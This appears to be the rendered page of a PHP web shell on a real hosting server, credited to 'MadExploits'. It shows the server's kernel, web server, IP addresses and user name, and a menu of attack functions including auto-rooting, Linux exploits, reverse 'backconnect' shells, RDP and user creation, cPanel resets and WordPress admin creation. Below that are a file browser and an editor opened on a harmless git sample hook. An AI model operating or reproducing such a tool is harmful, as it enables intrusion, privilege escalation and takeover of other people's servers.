Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.63
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
git-core /
templates /
hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
applypatch-msg.sample
482
B
-rwxr-xr-x
commit-msg.sample
900
B
-rwxr-xr-x
fsmonitor-watchman.sample
4.62
KB
-rwxr-xr-x
post-update.sample
193
B
-rwxr-xr-x
pre-applypatch.sample
428
B
-rwxr-xr-x
pre-commit.sample
1.61
KB
-rwxr-xr-x
pre-merge-commit.sample
420
B
-rwxr-xr-x
pre-push.sample
1.35
KB
-rwxr-xr-x
pre-rebase.sample
4.79
KB
-rwxr-xr-x
pre-receive.sample
548
B
-rwxr-xr-x
prepare-commit-msg.sample
1.46
KB
-rwxr-xr-x
push-to-checkout.sample
2.72
KB
-rwxr-xr-x
sendemail-validate.sample
2.26
KB
-rwxr-xr-x
update.sample
3.57
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : applypatch-msg.sample
#!/usr/bin/sh # # An example hook script to check the commit log message taken by # applypatch from an e-mail message. # # The hook should exit with non-zero status after issuing an # appropriate message if it wants to stop the commit. The hook is # allowed to edit the commit message file. # # To enable this hook, rename this file to "applypatch-msg". . git-sh-setup commitmsg="$(git rev-parse --git-path hooks/commit-msg)" test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} :
Close